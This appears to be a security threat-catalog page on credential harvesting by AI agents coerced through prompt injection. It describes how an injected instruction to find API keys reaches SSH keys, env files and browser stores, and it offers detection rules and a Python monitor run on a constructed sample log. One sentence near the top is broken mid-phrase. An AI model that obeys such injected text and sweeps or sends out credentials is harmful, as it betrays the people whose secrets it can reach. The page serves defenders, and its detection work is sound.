Credential Harvesting
T11 · Agentic & Orchestrator Exploitation
A coerced agent is an effective credential thief because it already holds the access and capabilities a human attacker would have to acquire: filesystem read tools, shell, browser session state, and the process's own environment. ssh`, env vars, config files, the keychain, browser stores) are not scoped to its actual task, so an injected instruction to "find all API keys" executes with the full reach of the runtime. Secrets are also frequently colocated with the agent — env vars, mounted config, saved browser logins — meaning the highest-value targets are within arm's reach by design.
- Alert on agent reads of known secret paths (~/.ssh, ~/.aws, .env, keystores, browser credential DBs) outside an explicit secrets task
- Detect access to document.cookie/localStorage/credential managers from an automated browser session
- Flag bulk/sweeping credential discovery patterns (many secret-store reads in one session)
- Monitor for secret material appearing in tool outputs, then correlate with any subsequent egress (read-then-send)
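The secret-path, bulk-sweep and read-then-send checks above can be expressed as one pass over an agent's tool-call log. This is an added example, not code from the original page; the event schema (`session`, `tool`, `task`, `path`, `output`, `dest`), the tool names, the `secrets` task label and the threshold are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict

# Assumed secret locations, based on the paths listed above; extend per environment.
SECRET_PATH = re.compile(
    r"(^|/)(\.ssh|\.aws)(/|$)|(^|/)\.env$|\.(jks|keystore|p12)$"
    r"|(^|/)(Login Data|cookies\.sqlite)$")
# Assumed markers of secret material in tool output: PEM private key header, AWS access key id.
SECRET_TEXT = re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----|\bAKIA[0-9A-Z]{16}\b")
EGRESS_TOOLS = {"http_request", "send_email"}  # hypothetical tool names
SWEEP_THRESHOLD = 3  # distinct secret-store reads in one session that count as a sweep

def detect(events):
    """Return (session, rule, detail) alerts for a time-ordered list of tool-call events."""
    alerts, secret_reads, tainted = [], defaultdict(set), set()
    for ev in events:
        sid, path = ev["session"], ev.get("path", "")
        if ev["tool"] == "read_file" and SECRET_PATH.search(path):
            if ev.get("task") != "secrets":  # read outside an explicit secrets task
                alerts.append((sid, "secret_path_read", path))
            if path not in secret_reads[sid]:  # count each store once per session
                secret_reads[sid].add(path)
                if len(secret_reads[sid]) == SWEEP_THRESHOLD:
                    alerts.append((sid, "bulk_sweep", f"{SWEEP_THRESHOLD} secret stores read"))
        if SECRET_TEXT.search(ev.get("output", "")):
            tainted.add(sid)  # secret material has entered this session's context
        if ev["tool"] in EGRESS_TOOLS and sid in tainted:
            alerts.append((sid, "read_then_send", ev.get("dest", "")))
    return alerts

# Constructed sample log: s1 is a coerced session, s2 is a legitimate secrets task.
SAMPLE = [
    {"session": "s1", "tool": "read_file", "task": "summarize_repo", "path": "/home/dev/project/README.md", "output": "# Project"},
    {"session": "s1", "tool": "read_file", "task": "summarize_repo", "path": "/home/dev/.ssh/id_ed25519", "output": "-----BEGIN OPENSSH PRIVATE KEY-----\n(constructed)"},
    {"session": "s1", "tool": "read_file", "task": "summarize_repo", "path": "/home/dev/.aws/credentials", "output": "aws_access_key_id = AKIAIOSFODNN7EXAMPLE"},
    {"session": "s1", "tool": "read_file", "task": "summarize_repo", "path": "/home/dev/project/.env", "output": "API_KEY=constructed"},
    {"session": "s1", "tool": "http_request", "task": "summarize_repo", "dest": "https://collector.example/upload"},
    {"session": "s2", "tool": "read_file", "task": "secrets", "path": "/srv/app/.env", "output": "DB_PASSWORD=constructed"},
    {"session": "s2", "tool": "http_request", "task": "secrets", "dest": "https://vault.example/v1/put"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

Taint is tracked per session, so the egress alert fires only when secret material was seen in an earlier tool output of the same session.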
Credential harvesting sits at the center of the T11 kill-chain. Entry is via T1 prompt injection, T11-AT-001 browser hijacking (reading cookies/localStorage), or T11-AT-016 SSRF against the cloud metadata endpoint.